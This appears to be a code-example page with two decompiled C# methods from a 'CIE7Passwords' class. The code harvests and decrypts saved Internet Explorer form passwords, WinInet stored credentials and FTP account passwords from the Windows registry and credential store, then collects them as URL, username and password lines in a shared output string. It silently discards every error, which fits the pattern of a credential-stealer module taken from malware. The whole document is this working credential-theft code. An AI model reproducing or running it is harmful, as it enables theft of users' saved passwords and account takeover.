示例#1
0
        // Token: 0x060000B5 RID: 181 RVA: 0x00006E38 File Offset: 0x00005038
        private void AddPasswdInfo(string strRess, int hKey)
        {
            strRess = Strings.LCase(strRess);
            byte[] bytes = Encoding.Unicode.GetBytes(strRess);
            string text  = this.GetSHA1Hash(ref bytes);

            text += Strings.Right("00" + Conversion.Hex(this.CheckSum(ref text)), 2);
            int  num2;
            int  num3;
            int  num  = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, IntPtr.Zero, ref num3);
            bool flag = num3 > 0;

            if (flag)
            {
                IntPtr lpData = Marshal.AllocHGlobal(num3);
                num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, lpData, ref num3);
                CIE7Passwords.DATA_BLOB data_BLOB;
                data_BLOB.cbData = num3;
                data_BLOB.pbData = lpData.ToInt32();
                CIE7Passwords.DATA_BLOB data_BLOB2;
                data_BLOB2.cbData = checked (Strings.Len(strRess) * 2 + 2);
                IntPtr hglobal = Marshal.StringToHGlobalUni(strRess);
                data_BLOB2.pbData = hglobal.ToInt32();
                CIE7Passwords.DATA_BLOB dataOut;
                CIE7Passwords.CryptUnprotectData(ref data_BLOB, 0, ref data_BLOB2, 0, 0, 0, ref dataOut);
                this.ProcessIEPass(strRess, text, dataOut);
                hglobal = new IntPtr(data_BLOB2.pbData);
                Marshal.FreeHGlobal(hglobal);
                CIE7Passwords.LocalFree(dataOut.pbData);
            }
        }
示例#2
0
 // Token: 0x060000B7 RID: 183 RVA: 0x00006F5C File Offset: 0x0000515C
 public void Refresh()
 {
     checked
     {
         try
         {
             Regex  regex = new Regex("name=\"([^\"]+)\"", RegexOptions.Compiled);
             int    hKey  = -2147483647;
             string text  = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage1";
             int    num;
             CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131097, ref num);
             int hKey2 = -2147483647;
             text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2";
             int num2;
             CIE7Passwords.RegOpenKeyEx(hKey2, ref text, 0, 131097, ref num2);
             bool flag = num2 != 0 || num != 0;
             if (flag)
             {
                 text = null;
                 int num4;
                 int num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, IntPtr.Zero, ref num4);
                 flag = (num4 > 0);
                 if (flag)
                 {
                     IntPtr intPtr = Marshal.AllocHGlobal(num4);
                     Marshal.WriteInt32(intPtr, num4);
                     text = null;
                     num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, intPtr, ref num4);
                     do
                     {
                         CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO;
                         object obj = Marshal.PtrToStructure(intPtr, internet_CACHE_ENTRY_INFO.GetType());
                         CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO2;
                         internet_CACHE_ENTRY_INFO = ((obj != null) ? ((CIE7Passwords.INTERNET_CACHE_ENTRY_INFO)obj) : internet_CACHE_ENTRY_INFO2);
                         flag = ((internet_CACHE_ENTRY_INFO.CacheEntryType & 2097153) != 0);
                         if (flag)
                         {
                             IntPtr intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpszSourceUrlName);
                             string text2   = this.GetStrFromPtrA(intPtr2);
                             flag = (text2.IndexOf("?") >= 0);
                             if (flag)
                             {
                                 text2 = text2.Substring(0, text2.IndexOf("?"));
                             }
                             flag = (Strings.InStr(text2, "@", CompareMethod.Binary) > 0);
                             if (flag)
                             {
                                 text2 = Strings.Mid(text2, Strings.InStr(text2, "@", CompareMethod.Binary) + 1);
                             }
                             flag = (num != 0 && (internet_CACHE_ENTRY_INFO.CacheEntryType & 1) == 1);
                             if (flag)
                             {
                                 intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpHeaderInfo);
                                 string strFromPtrA = this.GetStrFromPtrA(intPtr2);
                                 flag = (!string.IsNullOrEmpty(strFromPtrA) && strFromPtrA.Contains("text/html"));
                                 if (flag)
                                 {
                                     intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpszLocalFileName);
                                     string strFromPtrA2 = this.GetStrFromPtrA(intPtr2);
                                     try
                                     {
                                         try
                                         {
                                             foreach (object obj2 in regex.Matches(File.ReadAllText(strFromPtrA2)))
                                             {
                                                 Match match = (Match)obj2;
                                                 this.AddPasswdInfo(match.Groups[1].Value, num);
                                             }
                                         }
                                         finally
                                         {
                                             IEnumerator enumerator;
                                             flag = (enumerator is IDisposable);
                                             if (flag)
                                             {
                                                 (enumerator as IDisposable).Dispose();
                                             }
                                         }
                                     }
                                     catch (Exception ex)
                                     {
                                     }
                                 }
                             }
                             this.AddPasswdInfo(text2, num2);
                         }
                         num4 = 0;
                         CIE7Passwords.FindNextUrlCacheEntry(num3, IntPtr.Zero, ref num4);
                         Marshal.FreeHGlobal(intPtr);
                         flag = (num4 > 0);
                         if (flag)
                         {
                             intPtr = Marshal.AllocHGlobal(num4);
                             Marshal.WriteInt32(intPtr, num4);
                         }
                     }while (CIE7Passwords.FindNextUrlCacheEntry(num3, intPtr, ref num4) != 0);
                     CIE7Passwords.FindCloseUrlCache(num3);
                 }
                 CIE7Passwords.RegCloseKey(num);
                 CIE7Passwords.RegCloseKey(num2);
             }
             string lpszFilter = "Microsoft_WinInet_*";
             int    num5;
             int    num6;
             CIE7Passwords.CredEnumerate(lpszFilter, 0, ref num5, ref num6);
             short[] array = new short[37];
             flag = (num5 > 0);
             CIE7Passwords.DATA_BLOB data_BLOB;
             CIE7Passwords.DATA_BLOB data_BLOB2;
             CIE7Passwords.DATA_BLOB data_BLOB3;
             if (flag)
             {
                 int num7 = 0;
                 int num8 = num5 - 1;
                 int num9 = num7;
                 for (;;)
                 {
                     int num10 = num9;
                     int num11 = num8;
                     if (num10 > num11)
                     {
                         break;
                     }
                     IntPtr intPtr2 = new IntPtr(num6 + num9 * 4);
                     IntPtr intPtr  = Marshal.ReadIntPtr(intPtr2);
                     CIE7Passwords.CREDENTIAL credential;
                     object obj3 = Marshal.PtrToStructure(intPtr, credential.GetType());
                     CIE7Passwords.CREDENTIAL credential2;
                     credential = ((obj3 != null) ? ((CIE7Passwords.CREDENTIAL)obj3) : credential2);
                     intPtr2    = new IntPtr(credential.lpstrTargetName);
                     string str = this.CopyString(intPtr2);
                     data_BLOB.cbData = 74;
                     intPtr           = Marshal.AllocHGlobal(74);
                     string str2  = "abe2869f-9b47-4cd9-a358-c22904dba7f7\0";
                     int    num12 = 0;
                     int    num13;
                     do
                     {
                         Marshal.WriteInt16(intPtr, num12 * 2, (short)(Strings.Asc(Strings.Mid(str2, num12 + 1, 1)) * 4));
                         num12++;
                         num13 = num12;
                         num11 = 36;
                     }while (num13 <= num11);
                     data_BLOB.pbData  = intPtr.ToInt32();
                     data_BLOB2.pbData = credential.lpbCredentialBlob;
                     data_BLOB2.cbData = credential.dwCredentialBlobSize;
                     data_BLOB3.cbData = 0;
                     data_BLOB3.pbData = 0;
                     CIE7Passwords.CryptUnprotectData(ref data_BLOB2, 0, ref data_BLOB, 0, 0, 0, ref data_BLOB3);
                     Marshal.FreeHGlobal(intPtr);
                     intPtr2 = new IntPtr(data_BLOB3.pbData);
                     string   expression = Marshal.PtrToStringUni(intPtr2);
                     string[] array2     = Strings.Split(expression, ":", -1, CompareMethod.Binary);
                     int      num14      = Strings.InStr(Strings.Mid(str, 19), "/", CompareMethod.Binary);
                     p.OL = string.Concat(new string[]
                     {
                         p.OL,
                         "|URL| ",
                         Strings.Mid(str, 19, num14 - 1),
                         "\r\n|USR| ",
                         array2[0],
                         "\r\n|PWD| ",
                         array2[1],
                         "\r\n"
                     });
                     CIE7Passwords.LocalFree(data_BLOB3.pbData);
                     num9++;
                 }
             }
             CIE7Passwords.CredFree(num6);
             RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\FTP\\Accounts");
             foreach (string text3 in registryKey.GetSubKeyNames())
             {
                 RegistryKey registryKey2 = registryKey.OpenSubKey(text3);
                 foreach (string text4 in registryKey2.GetSubKeyNames())
                 {
                     RegistryKey registryKey3 = registryKey2.OpenSubKey(text4);
                     byte[]      array3       = (byte[])registryKey3.GetValue("Password");
                     byte[]      array4       = new byte[4];
                     int         num15        = 0;
                     int         num16        = text3.Length - 1;
                     int         num17        = num15;
                     for (;;)
                     {
                         int num18 = num17;
                         int num11 = num16;
                         if (num18 > num11)
                         {
                             break;
                         }
                         byte b = (byte)(text3[num17] & '\u001f');
                         array4[num17 & 3] = unchecked (array4[num17 & 3] + b);
                         num17++;
                     }
                     data_BLOB2.cbData = array3.Length;
                     IntPtr intPtr2 = Marshal.AllocHGlobal(array3.Length);
                     data_BLOB2.pbData = intPtr2.ToInt32();
                     byte[] source     = array3;
                     int    startIndex = 0;
                     intPtr2 = new IntPtr(data_BLOB2.pbData);
                     Marshal.Copy(source, startIndex, intPtr2, array3.Length);
                     data_BLOB3.cbData = 0;
                     data_BLOB3.pbData = 0;
                     GCHandle gchandle = GCHandle.Alloc(array4, GCHandleType.Pinned);
                     intPtr2          = gchandle.AddrOfPinnedObject();
                     data_BLOB.pbData = intPtr2.ToInt32();
                     data_BLOB.cbData = 4;
                     CIE7Passwords.CryptUnprotectData(ref data_BLOB2, 0, ref data_BLOB, 0, 0, 0, ref data_BLOB3);
                     gchandle.Free();
                     string[] array5 = new string[8];
                     array5[0] = p.OL;
                     array5[1] = "|URL| ";
                     array5[2] = string.Format("ftp://{0}@{1}/", text3, text4);
                     array5[3] = "\r\n|USR| ";
                     array5[4] = text4;
                     array5[5] = "\r\n|PWD| ";
                     string[] array6 = array5;
                     int      num19  = 6;
                     intPtr2       = new IntPtr(data_BLOB3.pbData);
                     array6[num19] = Marshal.PtrToStringUni(intPtr2);
                     array5[7]     = "\r\n";
                     p.OL          = string.Concat(array5);
                     CIE7Passwords.LocalFree(data_BLOB3.pbData);
                 }
             }
         }
         catch (Exception ex2)
         {
         }
     }
 }